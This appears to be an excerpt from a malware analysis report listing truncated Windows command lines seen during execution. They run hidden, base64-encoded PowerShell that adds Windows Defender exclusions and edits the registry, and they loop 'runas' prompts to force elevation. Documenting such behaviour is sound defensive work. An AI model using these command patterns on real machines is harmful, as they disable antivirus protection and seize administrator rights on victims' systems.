Technical Information
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoAcgBlAGcAIABhAGQ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "while($true){try{Start-Process 'cmd' -Verb runas -ArgumentList '/k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGU...
- '%WINDIR%\syswow64\cmd.exe' /k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoAc...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "while($true){try{Start-Process 'cmd' -Verb runas -ArgumentList '/k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGU...' (with hidden window)